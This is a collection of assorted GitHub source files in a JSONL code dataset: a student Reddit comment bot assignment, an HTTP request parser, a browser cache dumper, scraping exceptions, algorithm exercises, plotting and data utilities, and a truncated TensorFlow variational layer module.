number\r\n # of comments you know you've posted from the number above;\r\n # you can use comments that you post manually while logged into your bot to know \r\n # how many comments there should be. \r\n print('len(not_my_comments)=',len(not_my_comments))\r\n\r\n # if the length of your all_comments and not_my_comments lists are the same,\r\n # then that means you have not posted any comments in the current submission;\r\n # (your bot may have posted comments in other submissions);\r\n # your bot will behave differently depending on whether it's posted a comment or not\r\n has_not_commented = len(not_my_comments) == len(all_comments)\r\n\r\n if has_not_commented:\r\n # FIXME (task 2)\r\n # if you have not made any comment in the thread, then post a top level comment\r\n #\r\n # HINT:\r\n # use the generate_comment() function to create the text,\r\n # and the .reply() function to post it to reddit;\r\n # a top level comment is created when you reply to a post instead of a message\r\n submission.reply(generate_comment())\r\n\r\n else:\r\n # FIXME (task 3): filter the not_my_comments list to also remove comments that \r\n # you've already replied to\r\n # HINT:\r\n # there are many ways to accomplish this, but my solution uses two nested for loops\r\n # the outer for loop loops over not_my_comments,\r\n # and the inner for loop loops over all the replies of the current comment from the outer loop,\r\n # and then an if statement checks whether the comment is authored by you or not\r\n comments_without_replies = []\r\n for comment in not_my_comments:\r\n check_reply = True\r\n for reply in comment.replies:\r\n if reply.author==name:\r\n check_reply=False \r\n break \r\n if check_reply:\r\n comments_without_replies.append(comment)\r\n \r\n\r\n # HINT:\r\n # this is the most difficult of the tasks,\r\n # and so you will have to be careful to check that this code is in fact working correctly;\r\n # many students struggle with getting a large number of \"valid comments\"\r\n print('len(comments_without_replies)=',len(comments_without_replies))\r\n\r\n # FIXME (task 4): randomly select a comment from the comments_without_replies list,\r\n # and reply to that comment\r\n \r\n # HINT:\r\n # use the generate_comment() function to create the text,\r\n # and the .reply() function to post it to reddit;\r\n # these will not be top-level comments;\r\n # so they will not be replies to a post but replies to a message\r\n\r\n try:\r\n rand=random.choice(comments_without_replies)\r\n rand.reply(generate_comment())\r\n try:\r\n #comment_random.reply(generate_comment())\r\n # replying to the comment with the most upvotes instead #\r\n \r\n highest = 0\r\n for c in comments_without_replies:\r\n if c.score >= highest:\r\n highest = c.score\r\n to_reply = c \r\n to_reply.reply(generate_comment())\r\n \r\n except praw.exceptions.APIException:\r\n print('comment was deleted')\r\n pass\r\n except IndexError:\r\n print('my comments')\r\n pass\r\n\r\n\r\n # FIXME (task 5): select a new submission for the next iteration;\r\n # your newly selected submission should be randomly selected from the 5 hottest submissions\r\n \r\n next_iteration = list(reddit.subreddit(\"cs40_2022fall\").hot(limit=5))\r\n submission=random.choice(next_iteration)\r\n \r\n time.sleep(1)\r\n\r\n # except praw.exceptions.RedditAPIException as e:\r\n # for subexception in e.items:\r\n # if subxception.error_type=='RATELIMIT':\r\n # error_str=str(subexception)\r\n # print(error_str)\r\n\r\n # if 'minute' in error_str:\r\n # delay=error_str.split('for ')[-1].split(' minute')[0]\r\n # delay=int(delay)*60.0\r\n # else:\r\n # delay=error_str.split('for ')[-1].split(' second')[0]\r\n # delay=int(delay)\r\n # print(\"delay=\",delay)\r\n # time.sleep(delay)\r\n # sleep_count+=1\r\n # print('sleep count=',sleep_count)","repo_name":"justin-is-away/project4","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":10117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42047641821","text":"from ..exceptions.request_exceptions import ErrorParsingRequest, ErrorParsingRequestBody\n\nclass Parser():\n \"\"\"\n The parser is a class that only behaves like parser, only\n returns the parsed request.\n Example: \n -> simpleclient get https://www.books.com/books\n returns:\n request_method = \"GET\" ||\n request_url = \"https://www.books.com/books\n\n -> simpleclient post https://www.books.com/books title=\"The Lord of the Rings\" author=\"J.R.R. Tolkien\"\n returns:\n request_method = \"POST ||\n request_url = \"https://www.books.com/books\" ||\n request_body = {\n \"title\": \"The Lord of the Rings\",\n \"author\": \"J.R.R. Tolkien\"\n }\n \"\"\"\n\n def __init__(self):\n pass\n \n # get {url} {headers}\n def parse_GET_REQUEST(self, request):\n try:\n request_split = request.split(\"\")\n\n request_method = request_split[0]\n request_url = request_split[1]\n # append headers\n request_headers = ''.join(request_split[2:])\n except Exception:\n raise ErrorParsingRequest()\n \n return request_method, request_url, request_headers\n \n # post {url} headers|h {headers} body|b {body}\n def parse_POST_REQUEST(self, request):\n try:\n request_split = request.split(\" \")\n request_method = request_split[0]\n request_url = request_split[1]\n\n body_start = self.__get_body_start(request_split)\n header_start = self.__get_headers_start(request_split)\n\n if body_start < header_start:\n request_body = 1\n request_headers = self.__get_headers(request_split)\n request_body = self.__get_body(request_split)\n except Exception:\n raise ErrorParsingRequest()\n \n return request_method, request_url, request_headers, request_body\n\n def parse_PUT_REQUEST(self, request):\n return self.parse_POST_REQUEST(request)\n \n def parse_PATCH_REQUEST(self, request):\n return self.parse_POST_REQUEST(request)\n\n def parse_DELETE_REQUEST(self, request):\n return self.parse_POST_REQUEST(request)\n\n def __get_index_of(self, request_split: list, **tags) -> int:\n index_of_body: int = 0\n try:\n index_of_body = request_split.index(tags[0])\n except:\n try:\n index_of_body = request_split.index(tags[1])\n finally:\n pass\n return index_of_body\n\n def __get_body_start(self, request_split:list) -> list[str]:\n return self.__get_index_of(self, request_split, \"body\", \"b\")\n \n def __get_headers_start(self, request_split:list) -> list[str]:\n return self.__get_index_of(self, request_split, \"headers\", \"h\")\n \n def __get_headers(self, request_split: list, headers_start) -> dict[str or int, any] or None:\n headers = []\n\n if headers_start == 0:\n return None\n\n for field in request_split[headers_start:]:\n headers.append(field)\n if field in [\"body\", \"b\"]:\n break\n\n return headers\n\n def __get_body(self, request_split: list, body_start) -> dict[str or int, any] or None:\n body = []\n\n if body_start == 0:\n return None\n \n for field in request_split[body_start:]:\n body.append(field)\n if field in [\"body\", \"b\"]:\n break\n\n return body","repo_name":"octaviuspvn/Simpleclient","sub_path":"src/parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28249746746","text":"from samplers.list_samplers import *\n\nclass Sampler:\n def get(dataset, name, params):\n if name == \"simple\":\n sampler = SimpleSampler(dataset, params)\n elif name == \"subsimple\":\n sampler = SubSimpleSampler(dataset, params)\n else:\n raise NotImplementedError\n return sampler\n\n \n \n","repo_name":"apd10/core","sub_path":"Sampler.py","file_name":"Sampler.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15064830046","text":"'''\r\n작성일 : 2023년 4월 11일\r\n학과 : 컴퓨터공학부\r\n학번 : 202395032\r\n이름 : 최민호\r\n설명 : 두 수를 입력 받아 큰 수를 출력하는 프로그램을 작성하시오.\r\n'''\r\nnum1 = int(input( \"첫 번째 숫자 입력.\"))\r\nnum2 = int(input( \"�� 번째 숫자 입력.\"))\r\n\r\nif num1 > num2 :\r\n print(\"{}이 더 큰 수 입니다\".format(num1))\r\n \r\nelse : \r\n print(\"{}이 더 큰 수 입니다.\".format(num2))","repo_name":"minhokr/S-W-","sub_path":"chapter04/4장_0411_4_최민호.py","file_name":"4장_0411_4_최민호.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14225994023","text":"#try except with type define exception \na=1\nb=2\nc=0\ntry:\n c=a/b\n print(c)\n #put charter not number on console\n n=int(input(\"enter the number :\"))\n #note this can only handle arithematic error\nexcept ZeroDivisionError as e :\n \n print(\"we can't do it :\",e)\n #this will handle number format exception \nexcept ValueError as e :\n print(\"we can't do it :\",e)\n \nfinally:\n # here you write that stuff for example to disconnect the database conectivity etc\n print(\"hello\")\n print(c)\n","repo_name":"harshittaneja090/mywork.github.io","sub_path":"python/exception handling/tery catch 1.py","file_name":"tery catch 1.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31564975314","text":"import pygame\n\nfrom settings import *\n\npygame.font.init()\n\n\ndef db_show_grid():\n window = pygame.display.get_surface()\n text_font = pygame.font.SysFont('arial', TILE_WIDTH//4)\n\n for i in range(window.get_width()//TILE_WIDTH): \n for j in range(window.get_height()//TILE_HEIGHT): \n \n text_surf = text_font.render(f'[{i},{j}]',True,(255,0,0))\n text_rect = text_surf.get_rect(topleft=(i*TILE_WIDTH+5,j*TILE_HEIGHT))\n pygame.draw.rect(window,(0,0,0), (i*TILE_WIDTH,j*TILE_HEIGHT,TILE_WIDTH,TILE_HEIGHT), 2, 5)\n window.blit(text_surf,text_rect)\n\n\n","repo_name":"JamakaDev/pygame-side_scroller","sub_path":"src/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18804102205","text":"import sys\nimport os\nimport urllib\nimport uuid\nimport hashlib\n\nclass CacheDumper(object):\n def __init__(self, pathToDir=None, overwrite=True):\n \"\"\"\n Init cache manager\n \"\"\"\n self.pathToDir = pathToDir\n self.size_first = 15\n self.size_second = 15\n self.overwrite = overwrite\n\n\n def init(self):\n if not self.checkDir():\n self.initDir()\n\n def initDir(self):\n \"\"\"\n Generate cache directories\n \"\"\"\n print(\"Cache directories does not exist or are damaged, recreating directories now...\")\n\n if not os.path.exists(self.pathToDir):\n os.makedirs(self.pathToDir)\n\n for i in range(0, self.size_first + 1):\n dirpath = os.path.join(self.pathToDir, str(hex(i))[2:].zfill(1))\n if os.path.exists(dirpath):\n shutil.rmtree(dirpath)\n os.makedirs(dirpath)\n\n for j in range(0, self.size_second + 1):\n subdirpath = os.path.join(dirpath, str(hex(j))[2:].zfill(1))\n os.makedirs(subdirpath)\n\n print(\"Cache directories have been created successfully.\")\n\n\n def checkDir(self):\n \"\"\"\n Check if the cache directory alreay exists and has properly setup\n Return True if yes, otherwise return False\n \"\"\"\n print(\"Checking cache directories...\")\n if not os.path.exists(self.pathToDir):\n return False\n\n for i in range(0, self.size_first + 1):\n dirpath = os.path.join(self.pathToDir, str(hex(i))[2:].zfill(1))\n\n if not os.path.exists(dirpath):\n return False\n\n for j in range(0, self.size_second + 1):\n subdirpath = os.path.join(dirpath, str(hex(j))[2:].zfill(1))\n\n if not os.path.exists(subdirpath):\n return False\n\n print(\"Cache directories already exists, continue...\")\n return True\n\n\n def insert(self, url, content, isHeader=False, ext=None):\n \"\"\"\n Insert entry to cache, return true if new entry is written into cache, false otherwise\n \"\"\"\n key, dirpath, filepath = self.genPathFromUrl(url, isHeader, ext)\n\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)\n elif os.path.exists(filepath) and not self.overwrite:\n return False\n\n with open(filepath, 'wb') as tempfile:\n if isinstance(content, str):\n tempfile.write(bytes(content, 'utf-8'))\n else:\n tempfile.write(content)\n\n return True\n\n\n def fetch(self, url, isHeader=False):\n key, dirpath, filepath = self.genPathFromUrl(url, isHeader)\n if not os.path.exists(filepath):\n return None\n\n content = None\n with open(filepath, 'r') as tempfile:\n content = tempfile.read()\n\n return content\n\n def genPathFromUrl(self, url, isHeader, ext):\n m = hashlib.md5();\n m.update(url)\n key = m.hexdigest()\n\n first_dir, second_dir = key[0:1], key[1:2]\n dirpath = os.path.join(self.pathToDir, first_dir, second_dir, key)\n filepath = None\n filepath = os.path.join(dirpath, \"header.txt\" if isHeader else (\"content\" + ext if ext else \"content\"))\n return key, dirpath, filepath\n","repo_name":"Yobretaw/ChromeCacheExtractor","sub_path":"src/dump_cache.py","file_name":"dump_cache.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"31445894395","text":"from bs4 import BeautifulSoup\n\n\nclass ScrapingError(Exception):\n \"\"\"\n Base class for exceptions related to Web Scraping\n\n Attributes:\n soup: the [BeautifulSoup] object that we're scraping from\n query_args: the arguments describing the information we were looking for\n message: the message held by the exception\n \"\"\"\n\n def __init__(self, soup, query_args, message):\n self.soup = soup\n self.query_args = query_args\n self.message = message\n\n super().__init__(self.message)\n\n\nclass ScrapingFindError(ScrapingError):\n \"\"\"\n Exception raised when data of interest was not found in the webpage being scraped\n\n Attributes:\n soup: the [BeautifulSoup] object that we're scraping from\n query_args: the arguments used in the search\n message: the message held by the exception\n \"\"\"\n\n def __init__(self, soup, query_args, message=None):\n self.soup = soup\n self.query_args = query_args\n\n if message:\n self.message = message\n else:\n self.message = f\"Failed to find the following contents in the BeautifulSoup object: {query_args}\"\n\n super().__init__(self.soup, self.query_args, self.message)\n\n\nclass ScrapingFormatError(ScrapingError):\n \"\"\"\n Exception raised when an assumption of the webpage's HTML format was violated\n\n Attributes:\n soup: the [BeautifulSoup] object that we're scraping from\n query_args: the arguments used in the search\n message: the message held by the exception\n \"\"\"\n\n def __init__(self, soup, query_args, message=None):\n self.soup = soup\n self.query_args = query_args\n\n if message:\n self.message = message\n else:\n self.message = f\"An assertion about the format of the webpage was violated: {query_args}\"\n\n super().__init__(self.soup, self.query_args, self.message)\n\n\nclass ScrapingValueError(ScrapingError):\n \"\"\"\n Exception raised when we find an unexpected value while scraping\n\n Attributes:\n soup: the [BeautifulSoup] object that we're scraping from\n property: the name of the property we're scraping\n value: the unexpected value that we found\n message: the message held by the exception\n \"\"\"\n\n def __init__(self, soup, query_args, property, value, message=None):\n self.soup = soup\n self.property = property\n self.value = value\n self.query_args = query_args\n\n if message:\n self.message = message\n else:\n self.message = f\"Found an unexpected value for the following property: {property}={value}\"\n\n super().__init__(self.soup, self.query_args, self.message)\n\n\ndef main():\n try:\n raise ScrapingFindError(None, {}, \"hi\")\n except ScrapingError as e:\n print(\"nice\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"BieniekAlexander/ltt","sub_path":"backend/src/scraping/scraping_errors.py","file_name":"scraping_errors.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20258488426","text":"# UVa 10611 - The Playboy Chimp\n# https://onlinejudge.org/external/106/10611.pdf\n#\n# Author: eloyhz\n# Date: Sep/10/2020\n#\n\n\ndef taller(height, chimps):\n left = 0\n # Left invariant: chimps[left] <= height (left not is taller)\n if chimps[left] > height:\n return chimps[left]\n right = len(chimps) - 1\n # Right invariant: chimps[right] > height (right is taller)\n if chimps[right] <= height:\n return 'X'\n while right > left + 1:\n mid = (left + right) // 2\n if chimps[mid] > height:\n right = mid\n else:\n left = mid\n return chimps[right]\n\n\ndef shorter(height, chimps):\n left = 0\n # Left invariant: chimps[left] < height (left is shorter)\n if chimps[left] >= height:\n return 'X'\n right = len(chimps) - 1\n # Right invariant: chimps[right] >= height (right not is shorter)\n if chimps[right] < height:\n return chimps[right]\n while right > left + 1:\n mid = (left + right) // 2\n if chimps[mid] < height:\n left = mid\n else:\n right = mid\n return chimps[left]\n\n\nif __name__ == '__main__':\n n = int(input())\n chimps = [int(x) for x in input().split()]\n q = int(input())\n luchu = [int(x) for x in input().split()]\n for h in luchu:\n print(shorter(h, chimps), taller(h, chimps))\n\n","repo_name":"eloyhz/competitive-programming","sub_path":"UVa/uva10611_the_playboy_chimp.py","file_name":"uva10611_the_playboy_chimp.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27363386435","text":"import numpy as np \nimport os\nfrom datetime import datetime\n\ndim = 3\nnVar = 6 \n\ndef plot_tecplot(in_file, out_file):\n \n infile = open(in_file, \"r\")\n \n # Read header lines \n\n line = infile.readline()\n line = infile.readline()\n line = infile.readline()\n line = infile.readline()\n line = infile.readline()\n split_line = line.split()\n\n N_x = int(split_line[1])\n N_y = int(split_line[2])\n N_z = int(split_line[3])\n\n\n line = infile.readline()\n\n # Get number of cells in the mesh \n\n split_line = line.split()\n n_cells = int(split_line[1])\n\n W = np.zeros((n_cells,nVar))\n\n coords = np.zeros((n_cells,dim))\n\n # Read the coordinates \n\n for i in range(0, n_cells):\n line = infile.readline()\n split_line = line.split()\n coords[i, 0] = np.float64(split_line[0])\n coords[i, 1] = np.float64(split_line[1])\n coords[i, 2] = np.float64(split_line[2])\n\n # Read some more headers \n \n line = infile.readline()\n line = infile.readline()\n line = infile.readline()\n\n for i in range(0, n_cells):\n line = infile.readline()\n split_line = line.split()\n for c in range (0, nVar):\n W[i,c] = np.float64(split_line[c])\n \n infile.close()\n\n # Reshape arrays to fit rectangular coordinates \n\n coords = coords.reshape((N_z, N_y, N_x, dim))\n W = W.reshape((N_z, N_y, N_x, nVar))\n\n # Start plotting \n \n outfile = open(out_file, \"w+\")\n now = datetime.now()\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n \n print(\"TITLE = \\\"Euler Equations. File created on: \", dt_string, \"\\\"\", file = outfile)\n outfile.write(\"\\nVARIABLES = \\\"x\\\", \\\"y\\\", \\\"z\\\", \\\"Density\\\", \\\"V_x\\\", \\\"V_y\\\", \\\"V_z\\\", \\\"Pressure\\\", \\\"Phi\\\" \")\n print('\\nZone I = ', N_x, \"J = \", N_y, \"K = \", N_z, file = outfile) \n \n for k in range(0, N_z):\n for j in range(0, N_y):\n for i in range (0, N_x):\n print(coords[k,j,i,0], coords[k,j,i,1], coords[k,j,i,2], W[k,j,i,0], W[k,j,i,1], W[k,j,i,2], W[k,j,i,3], W[k,j,i,4], W[k,j,i,5], file = outfile)\n\n \n outfile.close()\n###############################################################################################################################\n\nfor in_file in os.listdir('.'):\n if in_file.endswith('.vtk'):\n print(in_file)\n out_file = in_file.replace(\"vtk\", \"dat\")\n plot_tecplot(in_file, out_file)\n\n","repo_name":"MaguRaam/kirchhoff_petsc","sub_path":"box/bubble_euler/plot_tecplot.py","file_name":"plot_tecplot.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70354080836","text":"import numpy as np\n\nfrom ..trie import Trie\nfrom .utilities import missing_subfaces\n\n\ndef simplicial_edit_distance(H, min_size=2, exclude_min_size=True, normalize=True):\n \"\"\"Computes the simplicial edit distance.\n\n The number of edges needed to be added\n to a hypergraph to make it a simplicial complex.\n\n Parameters\n ----------\n H : xgi.Hypergraph\n The hypergraph of interest\n min_size: int, default: 1\n The minimum hyperedge size to include when\n calculating whether a hyperedge is a simplex\n by counting subfaces.\n\n Returns\n -------\n int\n The edit simpliciality\n \"\"\"\n\n edges = (\n H.edges.maximal().filterby(\"size\", min_size + exclude_min_size, \"geq\").members()\n )\n\n t = Trie()\n t.build_trie(H.edges.members())\n\n ms = set()\n for e in edges:\n ms.update(missing_subfaces(H, e, min_size=min_size))\n try:\n s = H.num_edges\n m = len(ms)\n\n if normalize:\n return m / (m + s)\n else:\n return m\n except ZeroDivisionError:\n return np.nan\n","repo_name":"nwlandry/the-simpliciality-of-higher-order-networks","sub_path":"sod/simpliciality/simplicial_edit_distance.py","file_name":"simplicial_edit_distance.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"8057603447","text":"import sqlite3\n\n\nclass DB:\n\n def __init__(self, name):\n self.name = name\n self.connection = None\n self.cursor = None\n\n def __enter__(self):\n self.connection = sqlite3.connect(self.name)\n self.cursor = self.connection.cursor()\n return self.cursor\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.connection.commit()\n self.connection.close()\n self.cursor = self.connection = None\n\ndb = DB('sql_den.db')\nwith db as cur:\n cur.execute(\"\"\"create table if not exists users(name, age, city);\"\"\")\n cur.execute(\"\"\"insert into users values ('Den Voropaev', 28, 'Vitebsk');\"\"\")\n cur.execute(\"\"\"insert into users values ('Mark Voropaev', 2, 'Vitebsk');\"\"\")\n","repo_name":"denvoropaev94/tasks_book_python","sub_path":"oop/with_sql.py","file_name":"with_sql.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17529986521","text":"import datetime\nfrom dateToTimestamp import dateToTimestamp\nfrom query import query\nimport dash\nimport dash_core_components as dcc\nimport dash_bootstrap_components as dbc\nimport dash_html_components as html\nimport data\n\nfrom navbar import navbar\n\n\ndef percentChange(currency1, currency2, startDate=datetime.date(2012, 1, 1), endDate=datetime.date.today()):\n start = dateToTimestamp(startDate)\n end = dateToTimestamp(endDate)\n currencies = [currency1, currency2]\n \n queryStr = 'SELECT DMIX.{0}.DATE_TXT, '.format(currencies[0])\n if currency1 == currency2:\n queryStr = queryStr + '((DMIX.{0}.CLOSE - DMIX.{0}.OPEN) / DMIX.{0}.OPEN), '.format(currency1)\n queryStr = queryStr + '((DMIX.{0}.CLOSE - DMIX.{0}.OPEN) / DMIX.{0}.OPEN) AS COPYOF{0}'.format(currency1)\n queryStr = queryStr + ' FROM DMIX.{0}'.format(currency1)\n else:\n position = 0\n while position < len(currencies):\n if position != 0:\n queryStr = queryStr + ', '\n queryStr = queryStr + '((DMIX.{0}.CLOSE - DMIX.{0}.OPEN) / DMIX.{0}.OPEN)'.format(currencies[position])\n position = position + 1;\n position = 0\n queryStr = queryStr + ' FROM '\n while position < len(currencies):\n if position == 0:\n queryStr = queryStr + \"DMIX.\" + currencies[position]\n else:\n queryStr = queryStr + ' INNER JOIN DMIX.{1} ON DMIX.{0}.DATE_TXT = DMIX.{1}.DATE_TXT'.format(currencies[0],\n currencies[\n position])\n position = position + 1\n queryStr = queryStr + \" WHERE {0}.DATE_TXT >= TO_DATE('{1}-{2}-{3}', 'MM-DD-YYYY')\".format(currencies[0], str(startDate.month).rjust(2, '0'), str(startDate.day).rjust(2, '0'), str(startDate.year).rjust(4, '0'))\n queryStr = queryStr + \" AND {0}.DATE_TXT <= TO_DATE('{1}-{2}-{3}', 'MM-DD-YYYY')\".format(currencies[0], str(endDate.month).rjust(2, '0'), str(endDate.day).rjust(2, '0'), str(endDate.year).rjust(4, '0'))\n for currency in currencies:\n queryStr = queryStr + ' AND DMIX.{0}.OPEN > 0'.format(currency)\n queryStr = queryStr + ' ORDER BY DMIX.{0}.DATE_TXT ASC'.format(currencies[0])\n\n headers = currencies\n if currency1 == currency2:\n headers[1] = 'Copy of ' + headers[1]\n headers.insert(0, \"datetime\")\n return query(queryStr, headers)\n\n\ndef percentChangePage():\n layout = html.Div([\n navbar(),\n dbc.Row([\n dbc.Col([html.H6('Crypto-Currencies:'),\n dcc.Dropdown(\n id='percent-change-currency-1',\n options=[{'label': i, 'value': i} for i in data.CURRENCIES],\n value='BTC',\n multi=False\n ),\n dcc.Dropdown(\n id='percent-change-currency-2',\n options=[{'label': i, 'value': i} for i in data.CURRENCIES],\n value='ETH',\n multi=False\n ),\n html.Div([\n html.Div([\n html.H6('Start Date:'),\n dcc.DatePickerSingle(\n id='percent-change-start',\n min_date_allowed=data.MIN_DATE,\n max_date_allowed=data.MAX_DATE,\n date=data.DEFAULT_DATE\n )],\n style={'display': 'inline-block'}),\n html.Div([\n html.H6('End Date:'),\n dcc.DatePickerSingle(\n id='percent-change-end',\n min_date_allowed=data.MIN_DATE,\n max_date_allowed=data.MAX_DATE,\n date=data.MAX_DATE\n )],\n style={'display': 'inline-block'})])],\n md=4),\n dbc.Col([dcc.Graph(id='percent-change-graph')])\n ]),\n dbc.Row([\n html.Div([\n html.P(\"\"\"\n This page demonstrates the correlation, or lack thereof, between the price shifts of two cryptocurrencies.\n Due to the nature of cryptocurrency as a collective platform without merit-based backing for its value,\n changes in the price of one coin have been anecdotally known to create changes in the price of others. For instance,\n Ethereum (ETH) and Bitcoin (BTC) are both built upon the Ethereum blockchain, meaning price changes of one modify the\n amount of money in circulation in the blockchain, resulting in changes in the value of both currencies.\n The graph shown above attempts to visualize this trend by showcasing the percent change in price for each hour of a currency's\n data relative to that of another. The percent change in price is calculated internally for each row of data by finding the difference\n between the closing and opening price of the currency in the given hour and dividing that by the opening price.\n The degree to which changes in the price of two cryptocurrencies correlate can be visualized by how similar the data is to a line y = ax.\n As an example, selecting the same currency twice places the data points along the line x=y, as the relationship between a currency's\n percentage price changes and themselves is one-to-one. The more a relationship between two currencies deviates from this standard, outliers notwithstanding, the less\n correlated their price shifts can be considered to be.\n Hovering over a given data point will provide information on when it was collected, allowing for easier consideration of outliers and what may have caused them.\n Key concepts covered for this query included the use of row-internal data calculations to determine overall trends in a data set and the comparison of two sets relative to each other in the same visualization.\n \"\"\")\n ], style = {'margin-left' : '30px', 'margin-right' : '30px'})\n ])\n ])\n return layout\n","repo_name":"kcdea/Database_Project","sub_path":"percentChange.py","file_name":"percentChange.py","file_ext":"py","file_size_in_byte":6579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18120368831","text":"from webviz_plotly import FilteredPlotly\nimport warnings\n\n\nclass BarChart(FilteredPlotly):\n \"\"\"Bar chart page element.\n\n :param data: Either a file path to a `csv` file or a\n :class:`pandas.DataFrame`. If a dataframe is given, each column is one\n set of bars in the chart. The dataframe index is used for the\n horizontal values. Similarly for the `csv` file, where a special\n column named ``index`` will be used for the horizontal values.\n :param barmode: Either ``'group'``, ``'stack'``, ``'relative'`` or\n ``'overlay'``. Defines how multiple bars per index-value are combined.\n See `plotly.js layout-barmode `_.\n \"\"\"\n def __init__(self, data, barmode='group', logy=False, *args, **kwargs):\n self.logy = logy\n super(BarChart, self).__init__(\n data,\n *args,\n logy=logy,\n layout={'barmode': barmode},\n **kwargs)\n\n def process_data(self, data):\n x = data.index.tolist()\n\n bars = []\n\n for column in data.columns:\n if self.logy and any(x <= 0 for x in data[column].tolist()\n if not isinstance(x, str)):\n warnings.warn('Non-positive values are not supported in a'\n ' logarithmic scale.')\n\n bars.append({\n 'y': data[column].tolist(),\n 'x': x,\n 'type': 'bar',\n 'name': column\n })\n\n return bars\n","repo_name":"equinor/webviz-archived","sub_path":"visualizations/bar_chart/webviz_bar_chart/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"16596204131","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nfrom tensorflow.contrib.distributions.python.ops import deterministic as deterministic_lib\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.layers import base as layers_lib\nfrom tensorflow.python.ops import init_ops\nfrom tensorflow.python.ops import nn\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops import standard_ops\nfrom tensorflow.python.ops.distributions import kullback_leibler as kl_lib\nfrom tensorflow.python.ops.distributions import normal as normal_lib\n\n\n__all__ = [\n \"DenseVariational\",\n \"dense_variational\",\n \"default_loc_scale_fn\",\n \"default_mean_field_normal_fn\",\n]\n\n\ndef default_loc_scale_fn(\n is_singular=False,\n loc_initializer=init_ops.random_normal_initializer(stddev=0.1),\n untransformed_scale_initializer=init_ops.random_normal_initializer(\n mean=-3., stddev=0.1),\n loc_regularizer=None,\n untransformed_scale_regularizer=None,\n loc_constraint=None,\n untransformed_scale_constraint=None):\n \"\"\"Makes closure which creates `loc`, `scale` params from `tf.get_variable`.\n\n This function produces a closure which produces `loc`, `scale` using\n `tf.get_variable`. The closure accepts the following arguments:\n\n dtype: Type of parameter's event.\n shape: Python `list`-like representing the parameter's event shape.\n name: Python `str` name prepended to any created (or existing)\n `tf.Variable`s.\n trainable: Python `bool` indicating all created `tf.Variable`s should be\n added to the graph collection `GraphKeys.TRAINABLE_VARIABLES`.\n add_variable_fn: `tf.get_variable`-like `callable` used to create (or\n access existing) `tf.Variable`s.\n\n Args:\n is_singular: Python `bool` indicating if `scale is None`. Default: `False`.\n loc_initializer: Initializer function for the `loc` parameters.\n The default is `tf.random_normal_initializer(mean=0., stddev=0.1)`.\n untransformed_scale_initializer: Initializer function for the `scale`\n parameters. Default value: `tf.random_normal_initializer(mean=-3.,\n stddev=0.1)`. This implies the softplus transformed result has mean\n approximately `0.05` and std. deviation approximately `0.005`.\n loc_regularizer: Regularizer function for the `loc` parameters.\n The default (`None`) is to use the `tf.get_variable` default.\n untransformed_scale_regularizer: Regularizer function for the `scale`\n parameters. The default (`None`) is to use the `tf.get_variable` default.\n loc_constraint: An optional projection function to be applied to the\n loc after being updated by an `Optimizer`. The function must take as input\n the unprojected variable and must return the projected variable (which\n must have the same shape). Constraints are not safe to use when doing\n asynchronous distributed training.\n The default (`None`) is to use the `tf.get_variable` default.\n untransformed_scale_constraint: An optional projection function to be\n applied to the `scale` parameters after being updated by an `Optimizer`\n (e.g. used to implement norm constraints or value constraints). The\n function must take as input the unprojected variable and must return the\n projected variable (which must have the same shape). Constraints are not\n safe to use when doing asynchronous distributed training. The default\n (`None`) is to use the `tf.get_variable` default.\n\n Returns:\n default_loc_scale_fn: Python `callable` which instantiates `loc`, `scale`\n parameters from args: `dtype, shape, name, trainable, add_variable_fn`.\n \"\"\"\n def _fn(dtype, shape, name, trainable, add_variable_fn):\n \"\"\"Creates `loc`, `scale` parameters.\"\"\"\n loc = add_variable_fn(\n name=name + \"_loc\",\n shape=shape,\n initializer=loc_initializer,\n regularizer=loc_regularizer,\n constraint=loc_constraint,\n dtype=dtype,\n trainable=trainable)\n if is_singular:\n return loc, None\n untransformed_scale = add_variable_fn(\n name=name + \"_untransformed_scale\",\n shape=shape,\n initializer=untransformed_scale_initializer,\n regularizer=untransformed_scale_regularizer,\n constraint=untransformed_scale_constraint,\n dtype=dtype,\n trainable=trainable)\n 